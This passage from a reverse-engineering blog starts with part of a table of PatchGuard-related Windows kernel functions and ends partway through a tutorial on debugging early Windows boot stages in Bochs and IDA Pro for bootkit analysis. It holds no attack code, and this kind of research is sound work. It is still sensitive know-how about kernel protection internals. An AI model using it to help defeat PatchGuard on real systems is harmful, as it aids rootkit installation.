<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KeCompactServiceTable</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KeInitAmd64SpecificState</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KeArmDiscoverCacheTopology</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiBalanceSetManagerDeferredRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiBalanceSetManagerDeferredRoutine</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiDispatchCallout</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcDelayedFlushTimer</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiDpcDispatch</td>
<td align="CENTER" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiFastGetCallersAddress </td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiFastGetCallersAddress </td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiFatalExceptionFilter</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiFatalExceptionFilter</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiFilterFiberContext</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiArmDiscoverCacheTopology</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiGetGdtIdt </td>
<td align="CENTER" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiLockExtendedServiceTable</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiLockExtendedServiceTable</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiLockServiceTable</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiLockServiceTable</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiMcaDeferredRecoveryService</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiInitializeExternalCacheController</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiScbQueueScanWorker</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PopPdcSampleIdleTimeouts</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiServiceTablesLocked </td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiServiceTablesLocked </td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiTimerDispatch</td>
<td align="CENTER" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PopPoCoalescinCallback</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PopPoCoalescinCallback</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PopThermalZoneDpc</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PopThermalZoneDpc</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PsQueryThreadTerminationPort</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PspGetReaperLink</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">RtlLookupFunctionEntryEx</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpFlushLockedHives</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">SdbpCheckDll</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PspInitDeferredResourceReservation</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpDelayFreeTMWorker</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">FsRtlPrivateResetHighestLockOffset </td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">FsRtlReInitializeTunnelCache</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">FsRtlRemovePerStreamContextEx</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiCheckForDivideOverflow</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiRundownScbQueue</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">RtlInsertSmallIndex</td>
</tr>
</tbody>
</table>
<br />
These functions were taken from an ntoskrnl.exe version 6.3.9600.17476 and either only used by PatchGuard or have some importance from the point of view of analysis. For example, IopTimerDispatch() is not a PatchGuard dedicated function but can be used as one of its DPC routines, while KeInitAmd64SpecificState() and KeArmDiscoverCacheTopology() are dedicated and only used to initiate PatchGuard.<br />
<br />
It seemed that some more functions were added for PatchGuard since Windows 10, but most, if not all, of these functions still remain the same name, so though this list is unlikely to be perfect, it would help you start your own analysis on both x64 and ARM.Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-19292694304061434712014-11-03T08:27:00.002-08:002014-11-03T08:35:23.375-08:00Debugging Early Boot Stages of Windows<div>
Recently, I have spent some time for reverse engineering <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="936d3b82-3bbd-432f-a677-1c59fb54c1ff" id="ebb97f89-94ef-4f17-984f-a8cbefc3ea21"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="a91fe5e0-deb8-49c2-a050-cd554b0ad69e" id="1b214a8a-19c7-405c-af14-10ecb4d2d2fc"></span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="936d3b82-3bbd-432f-a677-1c59fb54c1ff" id="ebb97f89-94ef-4f17-984f-a8cbefc3ea21"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="a91fe5e0-deb8-49c2-a050-cd554b0ad69e" id="1b214a8a-19c7-405c-af14-10ecb4d2d2fc"></span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="936d3b82-3bbd-432f-a677-1c59fb54c1ff" id="ebb97f89-94ef-4f17-984f-a8cbefc3ea21"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="a91fe5e0-deb8-49c2-a050-cd554b0ad69e" id="1b214a8a-19c7-405c-af14-10ecb4d2d2fc"></span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="936d3b82-3bbd-432f-a677-1c59fb54c1ff" id="ebb97f89-94ef-4f17-984f-a8cbefc3ea21"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="a91fe5e0-deb8-49c2-a050-cd554b0ad69e" id="1b214a8a-19c7-405c-af14-10ecb4d2d2fc"></span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="936d3b82-3bbd-432f-a677-1c59fb54c1ff" id="ebb97f89-94ef-4f17-984f-a8cbefc3ea21"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="a91fe5e0-deb8-49c2-a050-cd554b0ad69e" id="1b214a8a-19c7-405c-af14-10ecb4d2d2fc"></span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="936d3b82-3bbd-432f-a677-1c59fb54c1ff" id="ebb97f89-94ef-4f17-984f-a8cbefc3ea21"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="a91fe5e0-deb8-49c2-a050-cd554b0ad69e" id="1b214a8a-19c7-405c-af14-10ecb4d2d2fc"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="136a2e5d-6713-4549-a983-88b00b10d291" id="69c1f332-ed75-4874-9c09-93e2e7d7b675">bootkit</span></span></span>. It has been a fun exercise, but I had to struggle for setting up the environment before that as I could not find a page explains these steps. So as a note for me, I wrote down how to build a <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="22bf5347-cfde-4572-aaf5-fc6bb570a865" id="a3490d5c-293f-44e9-a58c-413cc90ee406">bootkit</span> debugging environment as well as how to configure Windows in order to attach a debugger at some early uncommon boot stages.</div>
<h3>
</h3>
<div>
<br /></div>
<h3>
Boot Processes</h3>
<span style="font-weight: normal;"><br /></span>
<span style="font-weight: normal;">Here are boot processes of BIOS based Windows XP and Windows 7 systems. I will discuss each stage except for <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="8d19c21f-1263-49a4-9c9a-18d2971b2a75" id="61e32c6d-8c46-4ad5-bd84-5ac3eca1e98a"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="1c1467ab-461c-45bc-8d34-cb5ff319951f" id="283f1912-2b13-49f0-9e6c-af1857da9853">BIOS</span></span> (POST) and Ntoskrnl.exe.</span><br />
<h4>
</h4>
<h4>
</h4>
<div>
<br /></div>
<h4>
Boot Process (XP)</h4>
<div>
BIOS (POST) -> MBR -> VBR -> Ntldr (Real-Mode) -> Ntldr (Protected-Mode) -> Ntoskrnl.exe</div>
<h4>
<br />Boot Process (Windows 7)</h4>
<div>
BIOS (POST) -> MBR -> VBR -> Bootmgr (Real-Mode) -> Bootmgr (Protected-Mode) -> Winload.exe -> Ntoskrnl.exe</div>
<div>
<br /></div>
<h3>
Debugging</h3>
<div>
<br /></div>
<h4>
MBR, VBR, Ntldr (Real-Mode) and Bootmgr (Real-Mode) </h4>
We need Bochs as no break points are provided on the course of these steps. <br />
<br />
Installing OS on <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="20a10026-8f5a-4539-823a-2b5245a58cc3" id="8b97bff4-fd5f-48af-a330-b2beeee00567"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6a7e196a-1192-43a1-bdd7-928a090c7c50" id="7598446c-c4e2-45c6-817d-d4a3c1cead03">Bochs</span></span> is not hard unless you try to find the perfect configurations such as smooth mouse movement, correct clock speed and working NICs. Since we are not going to use this OS anything but boot debugging, I do not encourage you to spend time for it.<br />
<br />
What you need to do to install OS are roughly as follows:<br />
<br />
<ol>
<li>Create a <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="58e4820a-b907-4251-b755-0245b07bca28" id="8d4e0e9f-4970-4154-b242-27059a7e352f"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="30480fc7-d252-4792-a3a1-fcc993233d75" id="272036f4-f9be-4584-ac3a-a43b41d1f4d7">flat hard</span></span> disk image with 10GB size using bximage.exe.</li>
<li>Configure <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="0bd32e16-37f2-4588-97de-be2686f9f5e3" id="a78b77ae-288b-4160-b18c-e1f9911da576"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="c3cdb1e9-aa18-4516-9ebc-61488ee85d1d" id="393a281c-027a-4d35-8d69-6ea9380d1498">bochs</span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="0bd32e16-37f2-4588-97de-be2686f9f5e3" id="705bd0cc-1eff-48ec-a69b-2ce9e7aec63f"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="c3cdb1e9-aa18-4516-9ebc-61488ee85d1d" id="42e33cae-7dbf-4b57-92c2-f0912bb15304">.</span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="0bd32e16-37f2-4588-97de-be2686f9f5e3" id="33e2f191-b90e-4115-a4b5-9ebe007b69b7"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="c3cdb1e9-aa18-4516-9ebc-61488ee85d1d" id="a3aac8e7-0be5-439f-89cb-1de5eaa67f01">bxrc</span></span> with boches.exe to <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="0bd32e16-37f2-4588-97de-be2686f9f5e3" id="b621fb4c-2b28-4a11-88c1-a3f4b5345d08"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="c3cdb1e9-aa18-4516-9ebc-61488ee85d1d" id="419589ad-1730-42d8-8a37-b751e3035fa0">use the</span></span> created hard disk image and an OS installer ISO image.</li>
<li>Start to install OS.</li>
</ol>
<br />
Installation may take a few hours. I also strongly recommend you to use the latest version of Bochs to avoid unnecessary troubles. Even if your old IDA Pro does not work with the latest one like my case, you can switch to old one after you completed the installation process for debugging. Here are my <a href="https://gist.github.com/tandasat/79f848dfcca4075285fd" target="_blank"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="131787f4-840f-439b-a693-1769a6b922af" id="8a3e456d-3b4c-4b74-b3a2-67b82ed8bdd9"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="f65ab2fe-7461-43fc-b0ce-60b2da08ca79" id="c79effb6-ba70-4eb3-a21e-267de19c3b3d">bochsrc</span></span> files</a> for version 2.6.6 and 2.4.6 with nearly identical configurations. You may use them as samples when you are not familiar with Bochs.<br />
<br />
Once you have <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="cc016891-414e-49d8-9b99-87592ef48e8e" id="0b05dd84-bf3f-4007-bfa1-87fb94e1232e">finished</span> <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="cc016891-414e-49d8-9b99-87592ef48e8e" id="0e992008-e156-43c1-874a-98ec70eafca9">installing</span> the OS (no need for applying Windows updates), you can debug MBR and VBR with either running it with bochsdbg.exe or corroborating with IDA Pro. If you hope to take the former way, you can add the following settings to enable a GUI debugger.<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">----<br />display_library: win32, options="gui_debug"<br />----</span></blockquote>
<br />
Although the GUI debugger works perfectly fine, it is far better to use IDA Pro if you have. Here is <a href="http://www.hexblog.com/?p=103" target="_blank">an article</a> about this process by <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="aa2eb7f4-2b65-49b7-a0fc-7df5d202cff8" id="703af0ab-6d53-48ec-b688-25ff2b7ba033"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="567f662b-80b8-4e1d-80e8-2f5cbfa684bb" id="d7fa0ea2-7937-4652-b86b-6c0c78483d22">HeyRays</span></span>, but in a <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="aa2eb7f4-2b65-49b7-a0fc-7df5d202cff8" id="53c7817e-4345-4b86-ab29-ec51983b9bf1"></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="aa2eb7f4-2b65-49b7-a0fc-7df5d202cff8" id="53c7817e-4345-4b86-ab29-ec51983b9bf1">nut</span>shell, you can follow these steps:<br />
<br />
<ol>
<li><a href="http://hexblog.com/ida_pro/files/mbr_bochs.zip" target="_blank">Download a file</a> mentioned in the article.</li>
<li>Copy <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="d85200ac-9bc8-4bef-ad13-e4d1e6833f14" id="f5491ee7-b3dd-4b8a-9b85-78835d448493"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6d37afd0-76ad-408c-ac75-7f1d8179cf76" id="cda89ecb-282e-4324-8108-77311512b209">mbr</span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="d85200ac-9bc8-4bef-ad13-e4d1e6833f14" id="87d1ec9b-2c99-4851-9d90-fed37eaee6a4"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6d37afd0-76ad-408c-ac75-7f1d8179cf76" id="b6047624-276a-4881-a2dd-558aadea3829">.</span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="d85200ac-9bc8-4bef-ad13-e4d1e6833f14" id="9636edd0-a2ce-402d-bfd8-287fd90ac1a8"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6d37afd0-76ad-408c-ac75-7f1d8179cf76" id="389fc7df-471f-4957-bc7c-6e978ef04d6a">py</span></span> to the same directory as a location of the hard disk image file.</li>
<li>Download and copy this <a href="https://gist.github.com/tandasat/87e615c8c291031dc09d" target="_blank">batch file</a> to the same directory (you will need to change paths in it).</li>
<li>Run the batch file. </li>
</ol>
<br />
You will see IDA Pro breaks at the very beginning of MBR (0x7c00) unless there is an error in configurations. Now, you can trace the code and should be able to debug VBR as well.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgURsMpcGnhwlINOwcb_IF4JUGNdxcB6FzYe8_D3rz_RTBtUgs17Kdej3Kc_CqI6mEr-e6jBAHBuCqP1FH-Y4yUQv2JY0RIVPCEXk8GvAVF2iEpBEmRGb5q429i-kwHGaaWNgB3kQDrU5A/s1600/ida.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgURsMpcGnhwlINOwcb_IF4JUGNdxcB6FzYe8_D3rz_RTBtUgs17Kdej3Kc_CqI6mEr-e6jBAHBuCqP1FH-Y4yUQv2JY0RIVPCEXk8GvAVF2iEpBEmRGb5q429i-kwHGaaWNgB3kQDrU5A/s1600/ida.png" height="414" width="640" /></a></div>
<br />
<br />
<h4>
<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="4f370715-005f-4945-9ce5-94cc91f48f0b" id="4254b8a5-f0c8-4d2e-b631-cb80ee442c85"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="e49413f9-afa2-4b4b-9ad3-3efdf11496c0" id="cfe6a8bb-3065-497f-9026-15bc44d646d0">Ntldr</span></span> (Real-Mode) and Bootmgr (Real-Mode)</h4>
<div>
Although it is totally possible to trace the code until it reaches to Ntldr or Bootmgr, it can be time consuming. One solution is to modify their entry point code with a breakpoint. Luckily, offset 0 of these files are actually entry points, so we can change offset 0 to a breakpoint. Here is an original entry point of Ntldr.</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOKapKchgTmrzxH2AjE4RjVfyBGXYDM5iqNvQFUbZqYKeHduyPlMybjoS7BfSFU65z4uSbWi9k7Gvl7D43IvsA82eDUkfBH2yetAOZlFTb1x35o72pFq_UJrCfVBfkj7FSz93Es7QtKcs/s1600/entryppp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOKapKchgTmrzxH2AjE4RjVfyBGXYDM5iqNvQFUbZqYKeHduyPlMybjoS7BfSFU65z4uSbWi9k7Gvl7D43IvsA82eDUkfBH2yetAOZlFTb1x35o72pFq_UJrCfVBfkj7FSz93Es7QtKcs/s1600/entryppp.png" height="168" width="400" /></a></div>
<div>
<br /></div>
<div>
Also, as we are using a <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="d0ebb301-283e-4b4c-b648-f7564b6adb14" id="eaaa88cf-c64d-4bf5-b610-9d06cb3ebba1"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="ec64461e-706d-40b7-96bb-89d67aa75490" id="cedd2e0a-3025-4bbc-8446-2cda6775a659">flat hard</span></span> disk image file, we can search code pattern of Ntldr or Bootmgr from the image file and change it. In my case, Ntldr was found at offset 0x133D55E00 in the image file.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_AqU2w-ynOHDcDTKzvmXV2dCEcxm13kyZAO4vAPpTW7A0h-M4znmdI-quvTAFYVru-MTyL82COPxfM1TOO7gxL6S5-f5WTYYn02-G8JbX8aLSV3i1M5zcRQIUU0g-zln-vgGG2nR52Q/s1600/patch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_AqU2w-ynOHDcDTKzvmXV2dCEcxm13kyZAO4vAPpTW7A0h-M4znmdI-quvTAFYVru-MTyL82COPxfM1TOO7gxL6S5-f5WTYYn02-G8JbX8aLSV3i1M5zcRQIUU0g-zln-vgGG2nR52Q/s1600/patch.png" height="139" width="640" /></a></div>
<div>
<br /></div>
<div>
Like the above image, you will probably need to install a magic_break provided by Bochs rather than regular 0xCC since the runtime environment is different from usual, the protected mode. <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="99150f15-688a-406d-9251-385be82b8d63" id="691f637a-ec1e-4dc0-9cfe-a4a53d941342"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="fb52cf2c-9206-43e6-85d7-6f466da8c3e1" id="7e732644-c66f-41b3-b521-25d98a6630c7">Bochs</span></span> treats an instruction 'xchg bx, bx' (0x87 0xdb) as a breakpoint when the following statement was added to the <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="99150f15-688a-406d-9251-385be82b8d63" id="5a8ca1ad-2e36-490c-b47a-e0acc2517a14"></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="99150f15-688a-406d-9251-385be82b8d63" id="5a8ca1ad-2e36-490c-b47a-e0acc2517a14"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="fb52cf2c-9206-43e6-85d7-6f466da8c3e1" id="a474b7f8-b667-4d44-bb77-ae5d29bafb8e">bochsrc</span></span>.</div>
<blockquote class="tr_bq">
<span style="font-size: x-small;">----</span> </blockquote>
<blockquote class="tr_bq">
<span style="font-size: x-small;">magic_break: enabled=1</span> </blockquote>
<blockquote class="tr_bq">
<span style="font-size: x-small;">----</span></blockquote>
Once you boot the virtual machine with Bochsdbg.exe, you should see the VM breaks at 0x2:0002.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs6YCJi-kGhg6D6dWCijSiGZY9mAefnEqqiQd0DjjhDAULVP_Y_YgW5OEcG3WG2XNO07sCbniycSOXFVdU0rlvSh4GauV-vXBjGfW-m-BfvKblhtTD_05ImFSedAIlQChiiL6lXjPqMq8/s1600/0x20002.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs6YCJi-kGhg6D6dWCijSiGZY9mAefnEqqiQd0DjjhDAULVP_Y_YgW5OEcG3WG2XNO07sCbniycSOXFVdU0rlvSh4GauV-vXBjGfW-m-BfvKblhtTD_05ImFSedAIlQChiiL6lXjPqMq8/s1600/0x20002.png" height="414" width="640" /></a></div>
<br />
0x2:0000 is the actual breakpoint which we have <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="e7b052de-a893-4e72-81c1-574d9316205e" id="41f49090-8ca3-4996-99bf-effcfa9957b7">set</span>. You can look an IDA to find where to go from here. In my case, the execution need to go to 0x01d8.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFe6TUAffJIg7a_lHuWvWUkE88COroM2f4KCb4FO1styvBKRmr3GzGjar_E5ZNFaE_pM0VME5omZmEd0QHXr3zkxNVZV0sKkbWak9NFGxVXPnyC9GpAVO2XhFuDCShnxVJeOFOozocaF0/s1600/dest.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFe6TUAffJIg7a_lHuWvWUkE88COroM2f4KCb4FO1styvBKRmr3GzGjar_E5ZNFaE_pM0VME5omZmEd0QHXr3zkxNVZV0sKkbWak9NFGxVXPnyC9GpAVO2XhFuDCShnxVJeOFOozocaF0/s1600/dest.png" height="115" width="320" /></a></div>
<br />
Then you can change EIP with a 'set $eip = 0x01d8' command and step in with a 's' command to execute a regular code sequence.<br />
<div class="separator" style="clear: both; text-align: center;">
